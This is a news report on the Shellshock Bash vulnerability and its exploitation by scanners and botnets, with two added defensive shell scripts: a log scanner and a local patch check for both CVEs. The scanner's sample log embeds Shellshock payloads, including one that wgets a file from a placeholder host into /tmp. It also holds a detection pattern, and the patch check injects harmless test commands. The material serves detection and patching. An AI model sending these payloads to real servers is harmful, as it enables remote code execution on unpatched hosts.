Bug afflicting Linux, Unix and Mac has already been abused.
The cybersecurity community has spotted a flurry of Shellshock exploits in the wild as it rushes to patch vulnerable systems which may number more than 500 million.
Attackers are probing servers en masse to check whether they are vulnerable to the flaw in Bash, the command-line shell common to the Linux, Unix and Mac OS X operating systems, and some are installing malware on unpatched machines.
Waylon Grange, senior malware researcher at security firm Blue Coat, said: "Since yesterday’s announcement of the [Shellshock] bug we’ve seen attackers waste no time before scanning the Internet.
"Additionally, we’ve also started seeing DDoS [distributed denial of service] botnets trying to utilise this in their attacks. For a little while I’d expect to see an ever-increasing amount of web traffic targeting this vulnerability."
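The mass scanning described above leaves a recognisable trace: the probe payload is a Bash function definition, beginning with "() {", placed in an HTTP header that a CGI script will export into the environment. The script below is an added example, not code from the article or from any of the researchers quoted; the access-log lines in it are constructed for the example, and the IP addresses are documentation ranges rather than real scanners.

```shell
#!/bin/sh
# Added example: spot Shellshock probe attempts in a web server access log.
# The log lines below are constructed for this example (combined log format:
# client IP, timestamp, request, status, bytes, referer, user-agent).
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/ping -c 1 198.51.100.9"
198.51.100.7 - - [25/Sep/2014:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Sep/2014:10:01:04 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 128 "() { :;}; /usr/bin/wget http://203.0.113.9/x -O /tmp/x" "curl/7.30"'

# Print every log line whose headers carry a function-definition prefix.
# The pattern tolerates optional whitespace so "(){" variants match as well.
shellshock_probes() {
    printf '%s\n' "$SAMPLE_LOG" | grep -E '\(\)[[:space:]]*\{'
}

# Number of matching lines, for a quick "are we being scanned?" answer.
probe_count() {
    shellshock_probes | wc -l | tr -d '[:space:]'
}

# Distinct source addresses, space-separated and sorted, for blocking or
# for checking whether the same hosts later appear as C&C infrastructure.
probe_sources() {
    shellshock_probes | awk '{print $1}' | sort -u | tr '\n' ' ' | sed 's/ $//'
}

# Stand-alone run: summarise the constructed log.
printf 'probe lines: %s\n' "$(probe_count)"
printf 'sources: %s\n' "$(probe_sources)"
shellshock_probes
```

Run against a real log, replace the constructed variable with `cat /var/log/apache2/access.log` in the pipeline; a match is a probe attempt, not proof of compromise, so follow it up by checking whether the named CGI path exists and whether the commands in the payload (here ping and wget) ran.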
Grange’s fears were corroborated by independent security researcher Yinette, who posted a malware sample to the code repository GitHub that contained a command and control (C&C) component, which lets attackers send instructions to infected computers.
Once a machine has been made part of a botnet it can be used to perpetrate further attacks on behalf of the attacker, including DDoS attacks in which servers are flooded with traffic until they can no longer respond.
Robert Graham of Errata Security added that most internet-facing vulnerable systems attackers could detect had likely already been compromised by yesterday morning.
"One key question is whether the Mac OS X and iPhone [Dynamic Host Configuration Protocol] service is vulnerable," he added. "Once the worm gets behind a firewall and runs a hostile DHCP server, that would be ‘game over’ for large networks."
Many large Linux vendors have already issued patches for the bug, but Red Hat later warned that its initial patch was incomplete after a related flaw in Bash’s handling of the same function-definition parsing was discovered; a second update fixed that flaw.
"All customers are strongly encouraged to apply the update as this flaw is being actively attacked in the wild," said Red Hat security engineer Huzaifa Sidhpurwala.
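Because the first round of patches was incomplete, checking for a patched package version is not enough; the behaviour has to be tested. The script below is an added example, not code from the article or from Red Hat, covering both the scanning check mentioned earlier and the follow-up flaw noted here. It assumes the standard identifiers for the two bugs: CVE-2014-6271 for the original bug and CVE-2014-7169 for the related flaw missed by the first patch.

```shell
#!/bin/sh
# Added example: test the local bash for the two Shellshock bugs.
# Assumed identifiers: CVE-2014-6271 (original bug), CVE-2014-7169
# (related parser flaw that the first patch did not cover).

# Probe 1: bash imports function definitions from environment variables
# whose value starts with "() {". A vulnerable bash keeps parsing past the
# closing brace and executes the trailing command on startup. A patched
# bash only imports definitions from specially named variables and ignores
# this one, so "VULNERABLE" never appears in the output.
check_cve_2014_6271() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# Probe 2: the incomplete first fix still mishandled a redirection inside
# an imported definition. A bash with that flaw turns "echo date" into a
# redirect, creating a file named "echo" in the working directory instead
# of printing the word "date". Run in a scratch directory so the only
# side effect is the file we look for.
check_cve_2014_7169() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    dir=$(mktemp -d) || { echo error; return 0; }
    ( cd "$dir" && env X='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1 )
    if [ -e "$dir/echo" ]; then result=vulnerable; else result=patched; fi
    rm -rf "$dir"
    echo "$result"
}

# Stand-alone run: a fully patched host prints "patched" for both.
printf 'CVE-2014-6271: %s\n' "$(check_cve_2014_6271)"
printf 'CVE-2014-7169: %s\n' "$(check_cve_2014_7169)"
```

A host that reports "patched" for the first probe but "vulnerable" for the second has only the initial, incomplete fix installed and still needs the follow-up update; a host that reports "no-bash" has no bash binary on the path, which means only that this shell is absent, not that other Bash-dependent services are safe.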